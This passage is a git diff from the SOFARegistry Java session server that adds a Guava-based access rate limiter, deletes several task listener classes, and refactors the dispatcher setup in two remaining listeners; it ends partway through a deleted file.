+package com.alipay.sofa.registry.server.session.limit; + +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.google.common.util.concurrent.RateLimiter; + +/** + * @author shangyu.wh + * @version 1.0: AccessLimitServiceImpl.java, v 0.1 2019-08-26 20:37 shangyu.wh Exp $ + */ +public class AccessLimitServiceImpl implements AccessLimitService { + + private RateLimiter rateLimiter; + + public AccessLimitServiceImpl(SessionServerConfig sessionServerConfig) { + rateLimiter = RateLimiter.create(sessionServerConfig.getAccessLimitRate()); + } + + @Override + public boolean tryAcquire() { + return rateLimiter.tryAcquire(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/CancelDataTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/CancelDataTaskListener.java deleted file mode 100644 index 0bae12a2e..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/CancelDataTaskListener.java +++ /dev/null @@ -1,94 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.server.session.scheduler.task.CancelDataTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.store.DataStore; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.Watchers; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: CancelDataTaskListener.java, v 0.1 2017-12-27 12:02 shangyu.wh Exp $ - */ -public class CancelDataTaskListener implements TaskListener { - - /** - * store subscribers - */ - @Autowired - private Interests sessionInterests; - - /** - * store publishers - */ - @Autowired - private DataStore sessionDataStore; - - @Autowired - private Watchers sessionWatchers; - - /** - * transfer data to DataNode - */ - @Autowired - private DataNodeService dataNodeService; - - @Autowired - private SessionServerConfig sessionServerConfig; - - private TaskDispatcher singleTaskDispatcher; - - @Autowired - private TaskProcessor dataNodeSingleTaskProcessor; - - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createSingleTaskDispatcher( - TaskDispatchers.getDispatcherName(TaskType.CANCEL_DATA_TASK.getName()), 10000, 80, - 1000, 100, dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.CANCEL_DATA_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - - SessionTask cancelDataTask = new CancelDataTask(sessionInterests, sessionDataStore, - sessionWatchers, dataNodeService, sessionServerConfig); - - cancelDataTask.setTaskEvent(event); - getSingleTaskDispatcher().dispatch(cancelDataTask.getTaskId(), cancelDataTask, - cancelDataTask.getExpiryTime()); - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataChangeFetchCloudTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataChangeFetchCloudTaskListener.java deleted file mode 100644 index e558c98f5..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataChangeFetchCloudTaskListener.java +++ /dev/null @@ -1,91 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.scheduler.task.DataChangeFetchCloudTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: DataChangeFetchCloudTaskListener.java, v 0.1 2018-03-16 15:26 shangyu.wh Exp $ - */ -public class DataChangeFetchCloudTaskListener implements TaskListener { - - @Autowired - private Interests sessionInterests; - - @Autowired - private SessionServerConfig sessionServerConfig; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - @Autowired - private ExecutorManager executorManager; - - @Autowired - private CacheService sessionCacheService; - - private TaskDispatcher singleTaskDispatcher; - - private TaskProcessor dataNodeSingleTaskProcessor; - - public DataChangeFetchCloudTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } - - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createSingleTaskDispatcher( - TaskDispatchers.getDispatcherName(TaskType.DATA_CHANGE_FETCH_CLOUD_TASK.getName()), - sessionServerConfig.getDataChangeFetchTaskMaxBufferSize(), - sessionServerConfig.getDataChangeFetchTaskWorkerSize(), 1000, 100, - dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.DATA_CHANGE_FETCH_CLOUD_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - SessionTask dataChangeFetchTask = new DataChangeFetchCloudTask(sessionServerConfig, - taskListenerManager, sessionInterests, executorManager, sessionCacheService); - dataChangeFetchTask.setTaskEvent(event); - getSingleTaskDispatcher().dispatch(dataChangeFetchTask.getTaskId(), dataChangeFetchTask, - dataChangeFetchTask.getExpiryTime()); - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataChangeFetchTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataChangeFetchTaskListener.java deleted file mode 100644 index 434e6a61c..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataChangeFetchTaskListener.java +++ /dev/null @@ -1,92 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.scheduler.task.DataChangeFetchTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: DataChangeFetchTaskListener.java, v 0.1 2017-12-13 11:58 shangyu.wh Exp $ - */ -public class DataChangeFetchTaskListener implements TaskListener { - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Autowired - private Interests sessionInterests; - - @Autowired - private ExecutorManager executorManager; - - @Autowired - private CacheService sessionCacheService; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - private TaskDispatcher singleTaskDispatcher; - - private TaskProcessor dataNodeSingleTaskProcessor; - - public DataChangeFetchTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } - - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createSingleTaskDispatcher( - TaskDispatchers.getDispatcherName(TaskType.DATA_CHANGE_FETCH_TASK.getName()), - sessionServerConfig.getDataChangeFetchTaskMaxBufferSize(), - sessionServerConfig.getDataChangeFetchTaskWorkerSize(), 1000, 100, - dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.DATA_CHANGE_FETCH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - SessionTask dataChangeFetchTask = new DataChangeFetchTask(sessionServerConfig, - taskListenerManager, executorManager, sessionInterests, sessionCacheService); - dataChangeFetchTask.setTaskEvent(event); - getSingleTaskDispatcher().dispatch(dataChangeFetchTask.getTaskId(), dataChangeFetchTask, - dataChangeFetchTask.getExpiryTime()); - } - -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataPushTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataPushTaskListener.java deleted file mode 100644 index c1afe3314..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/DataPushTaskListener.java +++ /dev/null @@ -1,86 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.scheduler.task.DataPushTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: DataChangeFetchTaskListener.java, v 0.1 2017-12-13 11:58 shangyu.wh Exp $ - */ -public class DataPushTaskListener implements TaskListener { - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Autowired - private Interests sessionInterests; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - @Autowired - private ExecutorManager executorManager; - - private TaskDispatcher singleTaskDispatcher; - - private TaskProcessor dataNodeSingleTaskProcessor; - - public DataPushTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } - - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.DATA_PUSH_TASK.getName(), dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.DATA_PUSH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - SessionTask dataPushTask = new DataPushTask(sessionInterests, sessionServerConfig, - executorManager, taskListenerManager); - dataPushTask.setTaskEvent(event); - getSingleTaskDispatcher().dispatch(dataPushTask.getTaskId(), dataPushTask, - dataPushTask.getExpiryTime()); - } - -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ProvideDataChangeFetchTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ProvideDataChangeFetchTaskListener.java index fe4b73208..661abf154 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ProvideDataChangeFetchTaskListener.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ProvideDataChangeFetchTaskListener.java @@ -18,12 +18,11 @@ import com.alipay.sofa.registry.remoting.exchange.Exchange; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.service.MetaNodeService; -import com.alipay.sofa.registry.server.session.registry.Registry; +import com.alipay.sofa.registry.server.session.provideData.ProvideDataProcessor; import com.alipay.sofa.registry.server.session.scheduler.task.ProvideDataChangeFetchTask; import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.store.Interests; import com.alipay.sofa.registry.server.session.store.Watchers; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; import com.alipay.sofa.registry.task.batcher.TaskDispatcher; import com.alipay.sofa.registry.task.batcher.TaskDispatchers; import com.alipay.sofa.registry.task.batcher.TaskProcessor; @@ -31,74 +30,66 @@ import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; import com.alipay.sofa.registry.task.listener.TaskListener; import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import javax.annotation.PostConstruct; import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: SubscriberRegisterFetchTaskListener.java, v 0.1 2017-12-07 19:53 shangyu.wh Exp $ */ public class ProvideDataChangeFetchTaskListener implements TaskListener { - @Autowired - private SessionServerConfig sessionServerConfig; - - /** - * trigger push client process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - /** - * MetaNode service - */ - @Autowired - private MetaNodeService metaNodeService; + @Autowired SessionServerConfig sessionServerConfig; - @Autowired - private Exchange boltExchange; + /** trigger push client process */ + @Autowired TaskListenerManager taskListenerManager; - @Autowired - private Interests sessionInterests; + /** MetaNode service */ + @Autowired MetaServerService metaServerService; - @Autowired - private Watchers sessionWatchers; + @Autowired Exchange boltExchange; - @Autowired - private Registry sessionRegistry; + @Autowired Watchers sessionWatchers; - private TaskDispatcher singleTaskDispatcher; + @Autowired ProvideDataProcessor provideDataProcessorManager; - private TaskProcessor dataNodeSingleTaskProcessor; + private TaskDispatcher singleTaskDispatcher; - public ProvideDataChangeFetchTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } + private final TaskProcessor dataNodeSingleTaskProcessor; - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK.getName(), dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } + public ProvideDataChangeFetchTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { + this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; + } - @Override - public boolean support(TaskEvent event) { - return TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK.equals(event.getTaskType()); - } + @PostConstruct + public void init() { + singleTaskDispatcher = + TaskDispatchers.createDefaultSingleTaskDispatcher( + TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK.getName(), dataNodeSingleTaskProcessor); + } - @Override - public void handleEvent(TaskEvent event) { + @Override + public TaskType support() { + return TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK; + } - SessionTask provideDataChangeFetchTask = new ProvideDataChangeFetchTask( - sessionServerConfig, taskListenerManager, metaNodeService, sessionWatchers, - boltExchange, sessionInterests, sessionRegistry); + @Override + public void handleEvent(TaskEvent event) { - provideDataChangeFetchTask.setTaskEvent(event); + SessionTask provideDataChangeFetchTask = + new ProvideDataChangeFetchTask( + sessionServerConfig, + taskListenerManager, + metaServerService, + sessionWatchers, + boltExchange, + provideDataProcessorManager); - getSingleTaskDispatcher().dispatch(provideDataChangeFetchTask.getTaskId(), - provideDataChangeFetchTask, provideDataChangeFetchTask.getExpiryTime()); - } + provideDataChangeFetchTask.setTaskEvent(event); -} \ No newline at end of file + singleTaskDispatcher.dispatch( + provideDataChangeFetchTask.getTaskId(), + provideDataChangeFetchTask, + provideDataChangeFetchTask.getExpiryTime()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/PushTaskSender.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/PushTaskSender.java deleted file mode 100644 index 29a6ebd5a..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/PushTaskSender.java +++ /dev/null @@ -1,41 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -/** - * - * @author shangyu.wh - * @version $Id: PushTaskSender.java, v 0.1 2018-12-18 19:31 shangyu.wh Exp $ - */ - -import com.alipay.sofa.registry.task.listener.TaskEvent; - -/** - * - * @author shangyu.wh - * @version $Id: PushTask.java, v 0.1 2018-12-11 14:22 shangyu.wh Exp $ - */ -public interface PushTaskSender { - - enum PushDataType { - RECEIVE_DATA, USER_ELEMENT, USER_ELEMENT_MULTI - } - - void executePushAsync(TaskEvent event); - - PushDataType getPushDataType(); -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ReceivedConfigDataPushTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ReceivedConfigDataPushTaskListener.java index 17cc54b5e..21982ea2b 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ReceivedConfigDataPushTaskListener.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ReceivedConfigDataPushTaskListener.java @@ -30,51 +30,55 @@ import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: SubscriberRegisterPushTaskListener.java, v 0.1 2017-12-11 20:44 shangyu.wh Exp $ */ public class ReceivedConfigDataPushTaskListener implements TaskListener { - @Autowired - private SessionServerConfig sessionServerConfig; + @Autowired private SessionServerConfig sessionServerConfig; - @Autowired - private ClientNodeService clientNodeService; + @Autowired private ClientNodeService clientNodeService; - @Autowired - private ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy; + @Autowired private ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy; - private TaskDispatcher singleTaskDispatcher; + private volatile TaskDispatcher singleTaskDispatcher; - private TaskProcessor clientNodeSingleTaskProcessor; + private TaskProcessor clientNodeSingleTaskProcessor; - public ReceivedConfigDataPushTaskListener(TaskProcessor clientNodeSingleTaskProcessor) { + public ReceivedConfigDataPushTaskListener(TaskProcessor clientNodeSingleTaskProcessor) { - this.clientNodeSingleTaskProcessor = clientNodeSingleTaskProcessor; - } + this.clientNodeSingleTaskProcessor = clientNodeSingleTaskProcessor; + } - public TaskDispatcher getSingleTaskDispatcher() { + public TaskDispatcher getSingleTaskDispatcher() { + if (singleTaskDispatcher == null) { + synchronized (this) { if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK.getName(), clientNodeSingleTaskProcessor); + singleTaskDispatcher = + TaskDispatchers.createDefaultSingleTaskDispatcher( + TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK.getName(), clientNodeSingleTaskProcessor); } - return singleTaskDispatcher; + } } + return singleTaskDispatcher; + } - @Override - public boolean support(TaskEvent event) { - return TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK.equals(event.getTaskType()); - } + @Override + public TaskType support() { + return TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK; + } - @Override - public void handleEvent(TaskEvent event) { + @Override + public void handleEvent(TaskEvent event) { - SessionTask receivedConfigDataPushTask = new ReceivedConfigDataPushTask( + SessionTask receivedConfigDataPushTask = + new ReceivedConfigDataPushTask( sessionServerConfig, clientNodeService, receivedConfigDataPushTaskStrategy); - receivedConfigDataPushTask.setTaskEvent(event); - getSingleTaskDispatcher().dispatch(receivedConfigDataPushTask.getTaskId(), - receivedConfigDataPushTask, receivedConfigDataPushTask.getExpiryTime()); - - } -} \ No newline at end of file + receivedConfigDataPushTask.setTaskEvent(event); + getSingleTaskDispatcher() + .dispatch( + receivedConfigDataPushTask.getTaskId(), + receivedConfigDataPushTask, + receivedConfigDataPushTask.getExpiryTime()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ReceivedDataMultiPushTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ReceivedDataMultiPushTaskListener.java deleted file mode 100644 index e4c8b06b3..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/ReceivedDataMultiPushTaskListener.java +++ /dev/null @@ -1,133 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.service.ClientNodeService; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.scheduler.task.ReceivedDataMultiPushTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.strategy.ReceivedDataMultiPushTaskStrategy; -import com.alipay.sofa.registry.server.session.strategy.TaskMergeProcessorStrategy; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import com.alipay.sofa.registry.timer.AsyncHashedWheelTimer; -import com.alipay.sofa.registry.timer.AsyncHashedWheelTimer.TaskFailedCallback; -import com.google.common.util.concurrent.ThreadFactoryBuilder; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: SubscriberRegisterPushTaskListener.java, v 0.1 2017-12-11 20:44 shangyu.wh Exp $ - */ -public class ReceivedDataMultiPushTaskListener implements TaskListener, PushTaskSender { - - private static final Logger LOGGER = LoggerFactory - .getLogger(ReceivedDataMultiPushTaskListener.class); - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Autowired - private ClientNodeService clientNodeService; - - @Autowired - private ExecutorManager executorManager; - - @Autowired - private Exchange boltExchange; - - @Autowired - private ReceivedDataMultiPushTaskStrategy receivedDataMultiPushTaskStrategy; - - private TaskMergeProcessorStrategy receiveDataTaskMergeProcessorStrategy; - - private TaskProcessor clientNodeSingleTaskProcessor; - - private AsyncHashedWheelTimer asyncHashedWheelTimer; - - public ReceivedDataMultiPushTaskListener(TaskProcessor clientNodeSingleTaskProcessor, - TaskMergeProcessorStrategy receiveDataTaskMergeProcessorStrategy, - SessionServerConfig sessionServerConfig) { - this.clientNodeSingleTaskProcessor = clientNodeSingleTaskProcessor; - - ThreadFactoryBuilder threadFactoryBuilder = new ThreadFactoryBuilder(); - threadFactoryBuilder.setDaemon(true); - asyncHashedWheelTimer = new AsyncHashedWheelTimer(threadFactoryBuilder.setNameFormat( - "Registry-ReceivedDataPushTask-WheelTimer").build(), - sessionServerConfig.getUserDataPushRetryWheelTicksDuration(), TimeUnit.MILLISECONDS, - sessionServerConfig.getUserDataPushRetryWheelTicksSize(), threadFactoryBuilder - .setNameFormat("Registry-ReceivedDataPushTask-WheelExecutor-%d").build(), - new TaskFailedCallback() { - @Override - public void executionRejected(Throwable e) { - LOGGER.error("executionRejected: " + e.getMessage(), e); - } - - @Override - public void executionFailed(Throwable e) { - LOGGER.error("executionFailed: " + e.getMessage(), e); - } - }); - - receiveDataTaskMergeProcessorStrategy.init(this); - this.receiveDataTaskMergeProcessorStrategy = receiveDataTaskMergeProcessorStrategy; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.RECEIVED_DATA_MULTI_PUSH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - receiveDataTaskMergeProcessorStrategy.handleEvent(event); - } - - @Override - public void executePushAsync(TaskEvent event) { - - SessionTask receivedDataMultiPushTask = new ReceivedDataMultiPushTask(sessionServerConfig, clientNodeService, - executorManager, boltExchange, receivedDataMultiPushTaskStrategy,asyncHashedWheelTimer); - receivedDataMultiPushTask.setTaskEvent(event); - - executorManager.getPushTaskExecutor() - .execute(() -> clientNodeSingleTaskProcessor.process(receivedDataMultiPushTask)); - } - - @Override - public PushDataType getPushDataType() { - return PushDataType.RECEIVE_DATA; - } - - /** - * Getter method for property taskMergeProcessorStrategy. - * - * @return property value of taskMergeProcessorStrategy - */ - public TaskMergeProcessorStrategy getTaskMergeProcessorStrategy() { - return receiveDataTaskMergeProcessorStrategy; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SessionRegisterDataTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SessionRegisterDataTaskListener.java deleted file mode 100644 index 38563b430..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SessionRegisterDataTaskListener.java +++ /dev/null @@ -1,82 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionRegisterDataTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; 